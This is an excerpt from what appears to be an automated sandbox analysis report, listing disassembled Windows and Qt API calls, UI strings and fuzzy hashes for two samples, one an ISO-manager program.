                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                                                                  • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                                                                    • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                                                    • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1557639607-0
                                                                                                                  • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                                  • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                                                                  • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                                                  • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                                                                  APIs
                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                                                                    • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                                    • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 612612615-0
                                                                                                                  • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                                                  • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                                                                  • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                                                  • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@TextWindow$Length
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2308334395-0
                                                                                                                  • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                                                  • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                                                                  • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                                                  • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                                                                  APIs
                                                                                                                  • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                                                                  • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2001801573-0
                                                                                                                  • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                                  • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                                                                  • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                                  • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 00401BA8
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientScreen$ParentRectWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099118873-0
                                                                                                                  • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                                  • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                                                                  • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                                  • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wtol
                                                                                                                  • String ID: GUIFlags$[G@
                                                                                                                  • API String ID: 2131799477-2126219683
                                                                                                                  • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                                  • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                                                                  • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                                  • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                  • String ID: ?O@
                                                                                                                  • API String ID: 1431749950-3511380453
                                                                                                                  • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                                  • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                                                                  • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                                  • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArray@@Byte$ArrayAscii_helper@Data@Typed$Item@@TreeWidget$?text@$V0@@$Burn_Star$CaseEdit@@LineQt@@@Sensitivity@$?child@?replace@?utf16@CreateFileV1@0$Box@@$Info@@UnicodeV0@$$$?append@?child?current?data@Bit@BootChecked@ComboCount@DestroyDirectoryGroupIndex@Local8V1@@Volume$?last?remove@?size@IndexInformationLong@RootString@@@TimeUtf8@Zone_gmtime64_time64memset
                                                                                                                  • String ID: Assembling UDF File Tree$Cannot create UDF file tree$Cannot create boot file$Operation cancelled by user$StarBurn_UDF2_VolumeUnicodeCreate() failed$Successfully completed ISO assembling
                                                                                                                  • API String ID: 1783736197-3985644204
                                                                                                                  • Opcode ID: e88ba802f91ad298d7b9768aaab23b4f5afe74b65865a79a90c54ac2eace4c06
                                                                                                                  • Instruction ID: ff017019fbdddc5a9144825d7245497648f7bdd3c07a093f24145d390a4efcbd
                                                                                                                  • Opcode Fuzzy Hash: e88ba802f91ad298d7b9768aaab23b4f5afe74b65865a79a90c54ac2eace4c06
                                                                                                                  • Instruction Fuzzy Hash: 65625E22E24A429AFB10CBA1D8962AD3772FB85B59F484031DA4EF7A64DF3CD549C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Box@@Message$?set$?fromArrayAscii_helper@Data@Typed$?addButton@Button@@Push$Action@@ButtonEnabled@Role@1@@String@@@Widget@@$?activate@?exec@?sender@?text@ActionButton@1@@Dialog@@Event@1@@Icon@Icon@1@@Object@@StandardText@Title@Widget@@@Window
                                                                                                                  • String ID: 1hasItemsToCopy(QTreeWidgetItem *)$1itemSelectionChanged()$1labelChanged(QString)$1needExtractBoot()$1openTreeContextMenu(QPoint)$2hasItemsToCopy(QTreeWidgetItem *)$2itemSelectionChanged()$2needExtractBoot()$2textChanged(QString)$2treeContextMenu(QPoint)$Active@ ISO Manager$CDFS$Load ISO$Successfully created ISO Image %1$UDF$Untitled-%1.iso$What File System dou you want to use?
                                                                                                                  • API String ID: 2569839877-1659945211
                                                                                                                  • Opcode ID: e672079aedba12a3cbd4d7aaeee16310aa4f2d187cee1472d45f774387a76a44
                                                                                                                  • Instruction ID: 416afa5f0453bc80fdcdaba92ad5fbb01013837ff67d7515d300705e695f8f5d
                                                                                                                  • Opcode Fuzzy Hash: e672079aedba12a3cbd4d7aaeee16310aa4f2d187cee1472d45f774387a76a44
                                                                                                                  • Instruction Fuzzy Hash: 8F324032E28A4296EB00DF64E8965AD3772FB54F49F494032DA0EB3A64DF3CE549C744
                                                                                                                  APIs
                                                                                                                  • ??0QWizardPage@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65374D7D0
                                                                                                                    • Part of subcall function 00007FF65374EF00: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374EF26
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374D818
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF65374D833
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374D842
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF65374D85D
                                                                                                                  • ?setTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65374D86A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D875
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D880
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D88B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D896
                                                                                                                  • ?setSubTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65374D8BA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D8C5
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374D8D7
                                                                                                                  • ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF65374D8EF
                                                                                                                  • ?setPixmap@QWizardPage@@QEAAXW4WizardPixmap@QWizard@@AEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF65374D8FE
                                                                                                                  • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FF65374D909
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D914
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                  • ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374D94A
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65374D97F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374D98A
                                                                                                                  • ??0QCheckBox@@QEAA@AEBVQString@@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65374D9D1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DA03
                                                                                                                  • ?setChecked@QAbstractButton@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DA0F
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65374DA44
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65374DA4E
                                                                                                                  • ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DA72
                                                                                                                  • ?setWordWrap@QLabel@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DA8D
                                                                                                                  • ?setOpenExternalLinks@QLabel@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DA99
                                                                                                                  • ??0QTreeView@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65374DABB
                                                                                                                  • ?setRootIsDecorated@QTreeView@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DAE4
                                                                                                                  • ?setAlternatingRowColors@QAbstractItemView@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DAF0
                                                                                                                    • Part of subcall function 00007FF65374E850: ??0QStandardItemModel@@QEAA@HHPEAVQObject@@@Z.QT5GUI ref: 00007FF65374E897
                                                                                                                    • Part of subcall function 00007FF65374E850: ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374E8BE
                                                                                                                    • Part of subcall function 00007FF65374E850: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374E8CC
                                                                                                                    • Part of subcall function 00007FF65374E850: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374E8F6
                                                                                                                    • Part of subcall function 00007FF65374E850: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374E901
                                                                                                                    • Part of subcall function 00007FF65374E850: ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374E919
                                                                                                                    • Part of subcall function 00007FF65374E850: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374E927
                                                                                                                    • Part of subcall function 00007FF65374E850: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374E953
                                                                                                                    • Part of subcall function 00007FF65374E850: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374E95E
                                                                                                                    • Part of subcall function 00007FF65374E850: ?tr@QObject@@SA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374E976
                                                                                                                    • Part of subcall function 00007FF65374E850: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374E984
                                                                                                                    • Part of subcall function 00007FF65374E850: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF65374E9B1
                                                                                                                    • Part of subcall function 00007FF65374E850: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374E9BC
                                                                                                                  • ??0QModelIndex@@QEAA@XZ.QT5CORE ref: 00007FF65374DB19
                                                                                                                  • ?setMaximumHeight@QWidget@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65374DB3D
                                                                                                                  • ?setAnimated@QTreeView@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DB49
                                                                                                                  • ?setSelectionMode@QAbstractItemView@@QEAAXW4SelectionMode@1@@Z.QT5WIDGETS ref: 00007FF65374DB58
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65374DB81
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65374DB8B
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65374DBB4
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65374DBBE
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FE8
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FEE
                                                                                                                  • ??0QCheckBox@@QEAA@AEBVQString@@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65374DC03
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DC35
                                                                                                                  • ?setChecked@QAbstractButton@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DC41
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65374DC4D
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65374DC76
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65374DC80
                                                                                                                  • ??0QLabel@@QEAA@AEBVQString@@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DCC8
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DCEF
                                                                                                                  • ??0QVBoxLayout@@QEAA@XZ.QT5WIDGETS ref: 00007FF65374DD0E
                                                                                                                  • ?addWidget@QBoxLayout@@QEAAXPEAVQWidget@@HV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DD3B
                                                                                                                  • ?addSpacing@QBoxLayout@@QEAAXH@Z.QT5WIDGETS ref: 00007FF65374DD49
                                                                                                                  • ?addWidget@QBoxLayout@@QEAAXPEAVQWidget@@HV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DD5C
                                                                                                                  • ?addWidget@QBoxLayout@@QEAAXPEAVQWidget@@HV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DD6F
                                                                                                                  • ?addWidget@QBoxLayout@@QEAAXPEAVQWidget@@HV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DD82
                                                                                                                  • ?addWidget@QBoxLayout@@QEAAXPEAVQWidget@@HV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DD95
                                                                                                                  • ?addWidget@QBoxLayout@@QEAAXPEAVQWidget@@HV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65374DDA8
                                                                                                                  • ?setLayout@QWidget@@QEAAXPEAVQLayout@@@Z.QT5WIDGETS ref: 00007FF65374DDB4
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374DDEB
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374DDFB
                                                                                                                  • ?arg@QString@@QEBA?AV1@HHHVQChar@@@Z.QT5CORE ref: 00007FF65374DE27
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374DE36
                                                                                                                  • ?arg@QString@@QEBA?AV1@HHHVQChar@@@Z.QT5CORE ref: 00007FF65374DE61
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65374DE70
                                                                                                                  • ?arg@QString@@QEBA?AV1@HHHVQChar@@@Z.QT5CORE ref: 00007FF65374DE9B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DEA6
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DEB1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DEBC
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65374DEE4
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65374DEEE
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DF05
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374DF0F
                                                                                                                    • Part of subcall function 00007FF653748950: ??0QNetworkAccessManager@@QEAA@PEAVQObject@@@Z.QT5NETWORK(?,?,00000000,00007FF65374DDD7), ref: 00007FF653748959
                                                                                                                    • Part of subcall function 00007FF653748950: ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FF65374DDD7), ref: 00007FF65374896D
                                                                                                                  Strings
